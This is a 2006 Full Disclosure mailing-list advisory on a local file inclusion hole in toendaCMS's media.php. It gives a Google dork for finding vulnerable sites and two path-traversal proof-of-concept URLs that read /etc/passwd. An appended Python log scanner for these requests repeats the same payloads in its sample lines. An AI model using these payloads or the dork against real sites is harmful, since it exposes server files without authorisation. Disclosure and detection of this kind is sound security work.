Full Disclosure mailing list archives

(no subject)


From: "MoHaJaLi" <mohajali2k4 () gmail com>
Date: Sat, 23 Sep 2006 13:45:58 -0700


Local File Include in toendaCMS.

Vulnerable File : media.php

googleDork: "Powered by toendaCMS"

PoC:

http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd

or

http://site.com/media.php?album=../../../../../../../../../../../../..&key=/etc/passwd

_____

Found By MoHaJaLi

Greetz to Eddy_BAck0o

_____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
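
A log check for the two request shapes in the PoC above, as an added example that is not part of the original post: it flags media.php requests whose album or key parameter holds a ".." segment or an absolute path. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameters named in the advisory.
TARGET_SCRIPT = "/media.php"
WATCHED_PARAMS = ("album", "key")
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_value(value):
    """Return a reason if a decoded parameter value looks like a path escape."""
    path = value.replace("\\", "/")
    if path.startswith("/"):
        return "absolute path"
    if ".." in path.split("/"):
        return "dot-dot segment"
    return None

def scan_line(line):
    """Return [(param, reason), ...] for one access log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith(TARGET_SCRIPT):
        return []
    # parse_qs percent-decodes, so %2e%2e%2f is inspected as ../
    params = parse_qs(url.query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            reason = suspicious_value(value)
            if reason:
                hits.append((name, reason))
    return hits

def scan_log(lines):
    """Return {line_number: hits} for lines with at least one hit."""
    return {n: h for n, line in enumerate(lines, 1) if (h := scan_line(line))}

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Sep/2006:14:01:07 -0700] "GET /media.php?album=1005bb&key=photo01.jpg HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/Sep/2006:14:02:11 -0700] "GET /media.php?album=1005bb&key=../../../../etc/passwd HTTP/1.1" 200 1873',
    '192.0.2.77 - - [23/Sep/2006:14:02:15 -0700] "GET /media.php?album=../../../..&key=/etc/passwd HTTP/1.1" 200 1873',
    '192.0.2.77 - - [23/Sep/2006:14:02:19 -0700] "GET /media.php?album=1005bb&key=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1873',
    '192.0.2.10 - - [23/Sep/2006:14:03:40 -0700] "GET /index.php?id=../x HTTP/1.1" 404 210',
]
```

Requests to other scripts are ignored on purpose, so the fifth sample line produces no hit even though it contains "..".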

